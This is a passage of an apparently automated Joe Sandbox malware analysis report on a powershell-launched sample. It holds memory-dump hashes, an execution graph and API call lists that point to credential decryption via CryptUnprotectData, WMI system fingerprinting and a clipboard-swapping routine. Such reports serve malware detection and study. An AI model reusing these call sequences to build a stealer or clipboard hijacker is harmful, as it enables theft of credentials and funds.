                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                            • API String ID: 0-3272787073
                                                            • Opcode ID: cb0e3a15c105b1c474b8e48e122a29c4539c3a3dad2fe81d53d7e59b737bf66e
                                                            • Instruction ID: e62f2e7817d7b7c951be92ee5fa2f06b558424612c25a07d01dab749679f4f8e
                                                            • Opcode Fuzzy Hash: cb0e3a15c105b1c474b8e48e122a29c4539c3a3dad2fe81d53d7e59b737bf66e
                                                            • Instruction Fuzzy Hash: 6E9117B2B04306CFDF29DB69D80066ABBE6AF85610F14847BD545CB291DB31D84BCB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-2825857601
                                                            • Opcode ID: c8393fc33dd48fa71e4f0c20d801478b5fbdb96377e4413d3c6dc0c2e5e52d47
                                                            • Instruction ID: ca2cea38624c41786a12d2afbfb86c549cd92b18cf1307382adada9fc0fd8cbd
                                                            • Opcode Fuzzy Hash: c8393fc33dd48fa71e4f0c20d801478b5fbdb96377e4413d3c6dc0c2e5e52d47
                                                            • Instruction Fuzzy Hash: AC51BCB0A3020ADFDF2ACE19D9447AA77B1FF42311F198576E8048B2D0D735D986CBA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                            • API String ID: 0-2825857601
                                                            • Opcode ID: a041fd9387b4c41731afe017563f45bf07a32fd135f5bf8f870ef50f19c006f4
                                                            • Instruction ID: d3109267de8c324c72b19a88d40ed2ed06c1265197fe501e3fc604629731685a
                                                            • Opcode Fuzzy Hash: a041fd9387b4c41731afe017563f45bf07a32fd135f5bf8f870ef50f19c006f4
                                                            • Instruction Fuzzy Hash: 3141B6F5A0420ADFDF2E8E25C4446A97BE5ABC2650F15807ED4048F1D2DB35F987CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$TQcq$TQcq$tP^q
                                                            • API String ID: 0-3549194529
                                                            • Opcode ID: 5375cb907e4866ba9df60e0fdb896d6e32d51aa578f92c1fbdcabf706167c7b4
                                                            • Instruction ID: 47d283bab77de639b4ac68511fdb05cec793f40ac43b6048436a6a15e338e4a5
                                                            • Opcode Fuzzy Hash: 5375cb907e4866ba9df60e0fdb896d6e32d51aa578f92c1fbdcabf706167c7b4
                                                            • Instruction Fuzzy Hash: 6C41E7B1B00206DFDF298E24D40476AB7B2BF85711F1984BAE8415F2D0D772D887CBA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (bq$(bq$Hbq$Hbq
                                                            • API String ID: 0-2599935029
                                                            • Opcode ID: 47b1fc00e07fefa7762cf4dbe1fda045aa36f5101d4987afe056e199e3afc7d7
                                                            • Instruction ID: f241b5e8e45e07b99160084dbff1b530c012c2234fe466b5a5af1fddc4d75a27
                                                            • Opcode Fuzzy Hash: 47b1fc00e07fefa7762cf4dbe1fda045aa36f5101d4987afe056e199e3afc7d7
                                                            • Instruction Fuzzy Hash: 5BC1AA307045599FCB44EF69C880A6E7BA2FF88310F1585A9E909CF3A5DB34ED46CB91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 4'^q$4'^q$tP^q$tP^q
                                                            • API String ID: 0-3859475322
                                                            • Opcode ID: fe85862dda00e8038f10d5a10b038af42b7f9e05de976e5a86de456f519986b0
                                                            • Instruction ID: 6246317093bcc20f4feb38322727d4a2c8beb2986c3c3a16a6b28fc422df9e73
                                                            • Opcode Fuzzy Hash: fe85862dda00e8038f10d5a10b038af42b7f9e05de976e5a86de456f519986b0
                                                            • Instruction Fuzzy Hash: 24A138B1B10216CFCF268B69D80067ABBE6AF86710F18847AD445DB2D1DB31DD47C7A2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ]$`Q^q$`Q^q$`Q^q
                                                            • API String ID: 0-3436734849
                                                            • Opcode ID: e8b0f87bf0211355772c0f64843b09d9f89c72874ce4c7a93fe102a33ad6f6d5
                                                            • Instruction ID: 1bf85d3f486f5b12012babbcca0dc3412762db5dff3942ec577f08d54e2b09d9
                                                            • Opcode Fuzzy Hash: e8b0f87bf0211355772c0f64843b09d9f89c72874ce4c7a93fe102a33ad6f6d5
                                                            • Instruction Fuzzy Hash: 59A136B1B002158FCF158F7889006AABBE6AFD6310F1484BAD485DB395DB31DE46C7E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (_^q$(_^q$(_^q$(_^q
                                                            • API String ID: 0-2697572114
                                                            • Opcode ID: 52522424847388ca6abbfde01a28efb9d5642c7a0355a968605ac2f46cfc6875
                                                            • Instruction ID: 99e9f364d1783601169f243774438816a4bbe32069b7cd530b7509dea7c45f8e
                                                            • Opcode Fuzzy Hash: 52522424847388ca6abbfde01a28efb9d5642c7a0355a968605ac2f46cfc6875
                                                            • Instruction Fuzzy Hash: 7771C374B042558FC7049F78C8548AA7FB2FF86300B2445AAD406EB3A2DB35DC46CB91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (ztq$XRcq$XRcq$XRcq
                                                            • API String ID: 0-2300712528
                                                            • Opcode ID: a35d1b7e67fd40c6d772de28a2fc5dba5866568c0e908e015e8fbdd1d6e3f54e
                                                            • Instruction ID: 206057f55d5a5047f8cb01e463549a346f4dde5cdb04714dba146e10ed94d677
                                                            • Opcode Fuzzy Hash: a35d1b7e67fd40c6d772de28a2fc5dba5866568c0e908e015e8fbdd1d6e3f54e
                                                            • Instruction Fuzzy Hash: BE510B72710245DFCF15DA68C4106BEBBA2AFC6611F54C47AD8028F2D4DB36DA8BC762
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7190000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (o^q$(o^q$tP^q$$^q
                                                            • API String ID: 0-1137240099
                                                            • Opcode ID: 7e2202f363adb22e762dfd8edba152d8bc898b8ea32f16bc5266486d9c65b7f5
                                                            • Instruction ID: 158242c266c3d3682c03f4be294b99e737d8853d45e117ce9da4b3c53b1113b8
                                                            • Opcode Fuzzy Hash: 7e2202f363adb22e762dfd8edba152d8bc898b8ea32f16bc5266486d9c65b7f5
                                                            • Instruction Fuzzy Hash: CB4126B1E003059FCF298F698944A6ABFE1EF85710F1584BAD4149F292CB71DC4AC7B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TJcq$jjjjjj$$^q$$^q
                                                            • API String ID: 0-672324049
                                                            • Opcode ID: e6381625d170a185e19d4d8b639cac2b5161f20f756b985832773fc5cb2fa71e
                                                            • Instruction ID: 7a5cc659de9449b49f08b2a7a3ef2e343c5b759cbb80d43f625962d1c4143bb9
                                                            • Opcode Fuzzy Hash: e6381625d170a185e19d4d8b639cac2b5161f20f756b985832773fc5cb2fa71e
                                                            • Instruction Fuzzy Hash: 70B0125240D3C44EC7530A5554C01403F30AA3300030E41C6C4800F447D0004A46C722

                                                            Execution Graph

                                                            Execution Coverage:8.7%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:34.8%
                                                            Total number of Nodes:290
                                                            Total number of Limit Nodes:21
                                                            execution_graph 13140 4192c0 13142 4192c9 13140->13142 13141 419434 13142->13141 13144 43ec50 13142->13144 13145 43ec70 13144->13145 13146 43ed9e 13145->13146 13148 43bad0 LdrInitializeThunk 13145->13148 13146->13141 13148->13146 13456 42fb06 CoSetProxyBlanket 13457 42f787 SysFreeString 13458 42f8c4 13457->13458 13459 42c289 13460 42c294 13459->13460 13460->13460 13461 42c344 GetPhysicallyInstalledSystemMemory 13460->13461 13462 42c370 13461->13462 13462->13462 13149 421550 13161 43eaa0 13149->13161 13151 421590 13155 421c27 13151->13155 13160 421644 13151->13160 13165 43bad0 LdrInitializeThunk 13151->13165 13153 421bbe 13154 43a0a0 RtlFreeHeap 13153->13154 13156 421bce 13154->13156 13156->13155 13171 43bad0 LdrInitializeThunk 13156->13171 13160->13153 13166 43bad0 LdrInitializeThunk 13160->13166 13167 43a0a0 13160->13167 13162 43eac0 13161->13162 13163 43ebfe 13162->13163 13172 43bad0 LdrInitializeThunk 13162->13172 13163->13151 13165->13151 13166->13160 13168 43a0b3 13167->13168 13169 43a0b5 13167->13169 13168->13160 13170 43a0ba RtlFreeHeap 13169->13170 13170->13160 13171->13156 13172->13163 13463 43bc91 GetForegroundWindow 13464 43bcb1 13463->13464 13173 40e6d3 13175 40e760 13173->13175 13174 40e7b8 13175->13174 13177 43bad0 LdrInitializeThunk 13175->13177 13177->13174 13178 435bdb 13179 435be0 13178->13179 13180 435bf8 GetUserDefaultUILanguage 13179->13180 13181 435c20 13180->13181 13182 40d35c 13188 409710 13182->13188 13184 40d368 CoUninitialize 13185 40d390 13184->13185 13186 40d7a4 CoUninitialize 13185->13186 13187 40d7d0 13186->13187 13189 409724 13188->13189 13189->13184 13470 408720 13472 40872f 13470->13472 13471 408a15 ExitProcess 13472->13471 13473 408744 GetCurrentProcessId GetCurrentThreadId 13472->13473 13474 4089fe 13472->13474 13475 40876a 13473->13475 13476 40876e SHGetSpecialFolderPathW 13473->13476 13481 4089f9 13474->13481 13475->13476 13477 408860 13476->13477 13478 408994 GetForegroundWindow 13477->13478 13479 4089ab 13478->13479 13479->13474 13482 40c900 CoInitializeEx 13479->13482 13481->13471 13481->13474 13483 43c223 13484 43c250 13483->13484 13484->13484 13485 43c28e 13484->13485 13487 43bad0 LdrInitializeThunk 13484->13487 13487->13485 13199 420ee0 13200 420eee 13199->13200 13204 420f40 13199->13204 13200->13200 13205 421000 13200->13205 13206 421010 13205->13206 13206->13206 13207 43ec50 LdrInitializeThunk 13206->13207 13208 4210df 13207->13208 13488 4368a0 13489 4368c5 13488->13489 13491 436958 13489->13491 13497 43bad0 LdrInitializeThunk 13489->13497 13493 436a63 13491->13493 13494 4369e7 13491->13494 13496 43bad0 LdrInitializeThunk 13491->13496 13493->13494 13498 43bad0 LdrInitializeThunk 13493->13498 13496->13491 13497->13489 13498->13493 13209 40e465 13210 40e480 13209->13210 13213 436bf0 13210->13213 13212 40e590 13212->13212 13217 436c10 CoCreateInstance 13213->13217 13215 4373a9 13218 4373b9 GetVolumeInformationW 13215->13218 13216 436e1f SysAllocString 13220 436efe 13216->13220 13217->13215 13217->13216 13227 4373de 13218->13227 13221 436f06 CoSetProxyBlanket 13220->13221 13222 437398 SysFreeString 13220->13222 13223 436f26 SysAllocString 13221->13223 13224 43738e 13221->13224 13222->13215 13226 436ff0 13223->13226 13224->13222 13226->13226 13228 437020 SysAllocString 13226->13228 13227->13212 13231 43704e 13228->13231 13229 437375 SysFreeString SysFreeString 13229->13224 13230 43736b SysFreeString 13230->13229 13231->13229 13231->13230 13232 437092 VariantInit 13231->13232 13234 4370f0 13232->13234 13233 43735a VariantClear 13233->13230 13234->13233 13499 43c0a5 13500 43c0c0 13499->13500 13503 43bad0 LdrInitializeThunk 13500->13503 13502 43c20b 13503->13502 13504 43c4a5 13505 43c39f 13504->13505 13506 43c46e 13505->13506 13508 43bad0 LdrInitializeThunk 13505->13508 13508->13506 13235 40eb67 13236 40eb80 13235->13236 13238 40ebce 13236->13238 13281 43bad0 LdrInitializeThunk 13236->13281 13240 40ec4e 13238->13240 13282 43bad0 LdrInitializeThunk 13238->13282 13253 423c60 13240->13253 13242 40ecad 13257 423f20 13242->13257 13244 40eccd 13261 4259b0 13244->13261 13246 40eced 13270 426230 13246->13270 13250 40ecff 13283 431b10 OpenClipboard 13250->13283 13255 423d00 13253->13255 13254 423eea 13254->13242 13255->13254 13293 41f6a0 13255->13293 13258 423f2e 13257->13258 13258->13258 13312 43daa0 13258->13312 13260 423ef5 13260->13244 13264 4259d6 13261->13264 13264->13264 13265 43daa0 LdrInitializeThunk 13264->13265 13266 425c60 13264->13266 13269 43bad0 LdrInitializeThunk 13264->13269 13317 43ba70 13264->13317 13324 43deb0 13264->13324 13332 43e540 13264->13332 13340 43dbb0 13264->13340 13265->13264 13266->13246 13269->13264 13271 426250 13270->13271 13274 42629e 13271->13274 13354 43bad0 LdrInitializeThunk 13271->13354 13273 43a0a0 RtlFreeHeap 13275 40ecf6 13273->13275 13274->13275 13277 42637e 13274->13277 13355 43bad0 LdrInitializeThunk 13274->13355 13278 4266a0 13275->13278 13277->13273 13356 4266c0 13278->13356 13281->13238 13282->13240 13284 431b38 GetClipboardData 13283->13284 13285 40ed51 13283->13285 13286 431b55 GlobalLock 13284->13286 13287 431cf4 CloseClipboard 13284->13287 13288 431cf2 13286->13288 13290 431b6e 13286->13290 13287->13285 13288->13287 13289 431ce4 GlobalUnlock 13289->13288 13291 431bb6 GetWindowLongW 13290->13291 13292 431b83 13290->13292 13291->13292 13292->13289 13294 41f6d0 13293->13294 13294->13294 13297 421550 13294->13297 13298 43eaa0 LdrInitializeThunk 13297->13298 13299 421590 13298->13299 13303 41f6f9 13299->13303 13308 421644 13299->13308 13309 43bad0 LdrInitializeThunk 13299->13309 13301 421bbe 13302 43a0a0 RtlFreeHeap 13301->13302 13304 421bce 13302->13304 13303->13254 13304->13303 13311 43bad0 LdrInitializeThunk 13304->13311 13307 43a0a0 RtlFreeHeap 13307->13308 13308->13301 13308->13307 13310 43bad0 LdrInitializeThunk 13308->13310 13309->13299 13310->13308 13311->13304 13313 43dac0 13312->13313 13314 43db7f 13313->13314 13316 43bad0 LdrInitializeThunk 13313->13316 13314->13260 13316->13314 13318 43ba96 13317->13318 13319 43bab5 13317->13319 13320 43ba88 13317->13320 13323 43baaa 13317->13323 13322 43ba9b RtlReAllocateHeap 13318->13322 13321 43a0a0 RtlFreeHeap 13319->13321 13320->13318 13320->13319 13321->13323 13322->13323 13323->13264 13325 43ded0 13324->13325 13328 43df2e 13325->13328 13348 43bad0 LdrInitializeThunk 13325->13348 13326 43e1dc 13326->13264 13328->13326 13331 43e03e 13328->13331 13349 43bad0 LdrInitializeThunk 13328->13349 13329 43a0a0 RtlFreeHeap 13329->13326 13331->13329 13333 43e54f 13332->13333 13336 43e6af 13333->13336 13350 43bad0 LdrInitializeThunk 13333->13350 13334 43e8b5 13334->13264 13336->13334 13338 43e7fe 13336->13338 13351 43bad0 LdrInitializeThunk 13336->13351 13337 43a0a0 RtlFreeHeap 13337->13334 13338->13337 13341 43dbd0 13340->13341 13341->13341 13344 43dc2e 13341->13344 13352 43bad0 LdrInitializeThunk 13341->13352 13342 43de9c 13342->13264 13344->13342 13347 43dd7f 13344->13347 13353 43bad0 LdrInitializeThunk 13344->13353 13345 43a0a0 RtlFreeHeap 13345->13342 13347->13345 13347->13347 13348->13328 13349->13331 13350->13336 13351->13338 13352->13344 13353->13347 13354->13274 13355->13277 13357 426700 13356->13357 13357->13357 13368 43a0d0 13357->13368 13362 42679b 13366 426853 13362->13366 13367 4267a7 13362->13367 13384 43a800 13362->13384 13366->13367 13392 43a760 13366->13392 13380 43a480 13367->13380 13369 43a0f0 13368->13369 13372 43a12e 13369->13372 13396 43bad0 LdrInitializeThunk 13369->13396 13370 42678f 13376 43a320 13370->13376 13372->13370 13375 43a1fe 13372->13375 13397 43bad0 LdrInitializeThunk 13372->13397 13373 43a0a0 RtlFreeHeap 13373->13370 13375->13373 13377 43a3d2 13376->13377 13378 43a331 13376->13378 13377->13362 13378->13377 13398 43bad0 LdrInitializeThunk 13378->13398 13381 4266a9 13380->13381 13382 43a48a 13380->13382 13381->13250 13382->13381 13399 43bad0 LdrInitializeThunk 13382->13399 13385 43a850 13384->13385 13391 43a88e 13385->13391 13400 43bad0 LdrInitializeThunk 13385->13400 13386 43af4e 13386->13362 13388 43af02 13388->13386 13401 43bad0 LdrInitializeThunk 13388->13401 13390 43bad0 LdrInitializeThunk 13390->13391 13391->13386 13391->13388 13391->13390 13393 43a780 13392->13393 13395 43a7ce 13393->13395 13402 43bad0 LdrInitializeThunk 13393->13402 13395->13366 13396->13372 13397->13375 13398->13377 13399->13381 13400->13391 13401->13386 13402->13395 13403 410f71 13405 410f8b 13403->13405 13404 40f390 13405->13404 13407 415640 13405->13407 13408 415660 13407->13408 13408->13408 13409 43eaa0 LdrInitializeThunk 13408->13409 13410 41578d 13409->13410 13411 4157af 13410->13411 13415 4159df 13410->13415 13416 415a72 13410->13416 13420 4157ec 13410->13420 13428 43edf0 13410->13428 13411->13415 13411->13416 13411->13420 13432 43eec0 13411->13432 13415->13420 13439 43bad0 LdrInitializeThunk 13415->13439 13418 43eaa0 LdrInitializeThunk 13416->13418 13419 415bbd 13418->13419 13419->13420 13421 415c1b 13419->13421 13422 43edf0 LdrInitializeThunk 13419->13422 13423 415c59 13419->13423 13420->13404 13421->13423 13424 43eec0 LdrInitializeThunk 13421->13424 13422->13421 13423->13423 13427 415d0e 13423->13427 13438 43bad0 LdrInitializeThunk 13423->13438 13424->13423 13426 415f92 CryptUnprotectData 13426->13420 13427->13420 13427->13426 13430 43ee10 13428->13430 13429 43ee6e 13429->13411 13430->13429 13440 43bad0 LdrInitializeThunk 13430->13440 13434 43eee0 13432->13434 13433 4157dd 13433->13415 13433->13416 13433->13420 13436 43ef3e 13434->13436 13441 43bad0 LdrInitializeThunk 13434->13441 13436->13433 13442 43bad0 LdrInitializeThunk 13436->13442 13438->13427 13439->13420 13440->13429 13441->13436 13442->13433 13509 5701000 13510 5701102 13509->13510 13511 5701012 13509->13511 13512 5701030 Sleep 13511->13512 13513 570103a OpenClipboard 13511->13513 13512->13511 13514 57010f9 GetClipboardSequenceNumber 13513->13514 13515 570104a GetClipboardData 13513->13515 13514->13511 13516 57010f3 CloseClipboard 13515->13516 13517 570105a GlobalLock 13515->13517 13516->13514 13517->13516 13518 570106b GlobalAlloc 13517->13518 13520 57010e9 GlobalUnlock 13518->13520 13521 570109d GlobalLock 13518->13521 13520->13516 13522 57010b0 13521->13522 13523 57010b9 GlobalUnlock 13522->13523 13524 57010e0 GlobalFree 13523->13524 13525 57010cb EmptyClipboard SetClipboardData 13523->13525 13524->13520 13525->13520 13525->13524 13443 4359f0 13446 435a11 13443->13446 13444 435a60 13446->13444 13447 43bad0 LdrInitializeThunk 13446->13447 13447->13446 13526 40c935 CoInitializeSecurity 13448 42f37a 13449 42f3ce SysAllocString 13448->13449 13451 42f63c 13449->13451 13452 430779 13455 414a40 13452->13455 13454 43077e CoSetProxyBlanket 13455->13454

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 436bf0-436c0f 1 436c10-436c24 0->1 1->1 2 436c26-436c37 1->2 3 436c40-436c65 2->3 3->3 4 436c67-436ca5 3->4 5 436cb0-436cde 4->5 5->5 6 436ce0-436cfa 5->6 8 436d00-436d0b 6->8 9 436dcb-436e19 CoCreateInstance 6->9 10 436d10-436d6b 8->10 11 4373a9-4373dc call 43d450 GetVolumeInformationW 9->11 12 436e1f-436e53 9->12 10->10 14 436d6d-436d83 10->14 19 4373e6-4373e8 11->19 20 4373de-4373e2 11->20 15 436e60-436ed3 12->15 17 436d90-436dbc 14->17 15->15 18 436ed5-436f00 SysAllocString 15->18 17->17 21 436dbe-436dc3 17->21 24 436f06-436f20 CoSetProxyBlanket 18->24 25 437398-4373a5 SysFreeString 18->25 23 4373fd-437404 19->23 20->19 21->9 26 437410-437429 23->26 27 437406-43740d 23->27 28 436f26-436f3f 24->28 29 43738e-437394 24->29 25->11 30 437430-437456 26->30 27->26 31 436f40-436f66 28->31 29->25 30->30 32 437458-43746e 30->32 31->31 33 436f68-436fe1 SysAllocString 31->33 34 437470-437498 32->34 36 436ff0-43701e 33->36 34->34 35 43749a-4374bf call 41dfc0 34->35 40 4374c0-4374c8 35->40 36->36 38 437020-437050 SysAllocString 36->38 43 437056-437078 38->43 44 437375-43738a SysFreeString * 2 38->44 40->40 42 4374ca-4374cc 40->42 45 4374d2-4374e2 call 408060 42->45 46 4373f0-4373f7 42->46 51 43736b-437372 SysFreeString 43->51 52 43707e-437081 43->52 44->29 45->46 46->23 48 4374e7-4374ee 46->48 51->44 52->51 53 437087-43708c 52->53 53->51 54 437092-4370eb VariantInit 53->54 55 4370f0-437143 54->55 55->55 56 437145-437161 55->56 58 437167-43716d 56->58 59 43735a-437367 VariantClear 56->59 58->59 60 437173-43717d 58->60 59->51 61 4371c3 60->61 62 43717f-437184 60->62 64 4371c5-4371dd call 407fe0 61->64 63 43719c-4371a0 62->63 65 4371a2-4371ad 63->65 66 437190 63->66 72 4371e3-4371ed 64->72 73 437315-43732c 64->73 70 4371b6-4371bc 65->70 71 4371af-4371b4 65->71 69 437191-43719a 66->69 69->63 69->64 70->69 74 4371be-4371c1 70->74 71->69 72->73 75 4371f3-4371fb 72->75 76 43732e-437338 73->76 77 43734d-437356 call 407ff0 73->77 74->69 78 437200-43720a 75->78 76->77 79 43733a-437344 76->79 77->59 81 437220-437226 78->81 82 43720c-437211 78->82 79->77 83 437346-437349 79->83 86 437260-43726e 81->86 87 437228-43722b 81->87 85 437243 82->85 83->77 89 437245-437249 85->89 90 437270-437273 86->90 91 4372c4-4372cd 86->91 87->86 88 43722d-437240 87->88 88->85 94 43724b-437251 89->94 90->91 95 437275-4372c2 90->95 92 4372d6-4372d9 91->92 93 4372cf-4372d1 91->93 96 4372db-437309 92->96 97 43730e-437310 92->97 93->94 94->73 98 437257-437259 94->98 95->89 96->85 97->85 98->78 99 43725b 98->99 99->73
                                                            APIs
                                                            • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00436E11
                                                            • SysAllocString.OLEAUT32(F5A3FBA8), ref: 00436EDA
                                                            • CoSetProxyBlanket.COMBASE(D77F9D52,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00436F18
                                                            • SysAllocString.OLEAUT32(68DA6AD6), ref: 00436F6D
                                                            • SysAllocString.OLEAUT32(BD01C371), ref: 00437025
                                                            • VariantInit.OLEAUT32(F8FBFAF5), ref: 00437097
                                                            • SysFreeString.OLEAUT32(?), ref: 00437372
                                                            • SysFreeString.OLEAUT32(?), ref: 00437382
                                                            • SysFreeString.OLEAUT32(?), ref: 00437388
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00437399
                                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004373D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: String$Free$Alloc$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                            • String ID: \
                                                            • API String ID: 3857627774-2967466578
                                                            • Opcode ID: 75a42a090690cbf01e55e82e48ecf76e61ca4ec783f0b790b218db4d75954228
                                                            • Instruction ID: 8756ce95e963843fa03f31509ff188bcb667b0217098414990354d88698b1c24
                                                            • Opcode Fuzzy Hash: 75a42a090690cbf01e55e82e48ecf76e61ca4ec783f0b790b218db4d75954228
                                                            • Instruction Fuzzy Hash: 9132F1B1A483408FD724CF28C88076BBBE1EF99314F18892EE9D59B391D7789805CB56

                                                            Control-flow Graph

                                                            APIs
                                                            • Sleep.KERNELBASE(00000001), ref: 05701032
                                                            • OpenClipboard.USER32(00000000), ref: 0570103C
                                                            • GetClipboardData.USER32(0000000D), ref: 0570104C
                                                            • GlobalLock.KERNEL32(00000000), ref: 0570105D
                                                            • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05701090
                                                            • GlobalLock.KERNEL32 ref: 057010A0
                                                            • GlobalUnlock.KERNEL32 ref: 057010C1
                                                            • EmptyClipboard.USER32 ref: 057010CB
                                                            • SetClipboardData.USER32(0000000D), ref: 057010D6
                                                            • GlobalFree.KERNEL32 ref: 057010E3
                                                            • GlobalUnlock.KERNEL32(?), ref: 057010ED
                                                            • CloseClipboard.USER32 ref: 057010F3
                                                            • GetClipboardSequenceNumber.USER32 ref: 057010F9
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2889501146.0000000005701000.00000020.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                            • Associated: 00000009.00000002.2889460302.0000000005700000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000009.00000002.2889535161.0000000005702000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5700000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                            • String ID:
                                                            • API String ID: 1416286485-0
                                                            • Opcode ID: a581dba247bc2afce8732b62e07173520253e57e1d59a41f063f52d8a493d019
                                                            • Instruction ID: 663f53289ce68b1a188bdf15eff9c3c35a63ec0ae9022c2188cede4a6f5d467d
                                                            • Opcode Fuzzy Hash: a581dba247bc2afce8732b62e07173520253e57e1d59a41f063f52d8a493d019
                                                            • Instruction Fuzzy Hash: 5F21C836618250DBD7242B71EC0EB6BBFE8FF04745F44A028F985D6192EF619800F7A1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 122 415640-415657 123 415660-415668 122->123 123->123 124 41566a-41569a 123->124 125 4156a3 124->125 126 41569c-4156a1 124->126 127 4156a6-4156fe call 407fe0 125->127 126->127 130 415700-41571a 127->130 130->130 131 41571c-415724 130->131 132 415741-415751 131->132 133 415726-41572b 131->133 135 415771-415795 call 43eaa0 132->135 136 415753-41575a 132->136 134 415730-41573f 133->134 134->132 134->134 140 415a72-415a78 call 407ff0 135->140 141 4159d9 135->141 142 4159e8-4159fe 135->142 143 415a7b-415a83 135->143 144 4159ca-4159d0 call 407ff0 135->144 145 415a6c 135->145 146 41579c-4157b7 call 43edf0 135->146 147 4157ec-4157f3 135->147 148 4159df-4159e5 call 407ff0 135->148 149 4157be-4157e5 call 407fe0 call 43eec0 135->149 137 415760-41576f 136->137 137->135 137->137 140->143 150 415a00-415a24 142->150 155 415a85-415a8a 143->155 156 415a8c-415a93 143->156 144->141 146->140 146->141 146->142 146->143 146->144 146->147 146->148 146->149 152 415800-415808 147->152 148->142 149->140 149->141 149->142 149->143 149->144 149->147 149->148 179 415bcc 149->179 150->150 159 415a26-415a30 150->159 152->152 161 41580a-415832 152->161 164 415a96-415af2 call 407fe0 155->164 156->164 159->145 168 415a32-415a41 159->168 170 415834-415839 161->170 171 41583b 161->171 176 415b00-415b46 164->176 173 415a50-415a57 168->173 175 41583e-4158c5 call 407fe0 170->175 171->175 177 415a60-415a66 173->177 178 415a59-415a5c 173->178 188 4158d0-41593c 175->188 176->176 181 415b48-415b56 176->181 177->145 183 416028-416037 call 43bad0 177->183 178->173 182 415a5e 178->182 185 415b71-415b81 181->185 186 415b58-415b5f 181->186 182->145 201 416040 183->201 191 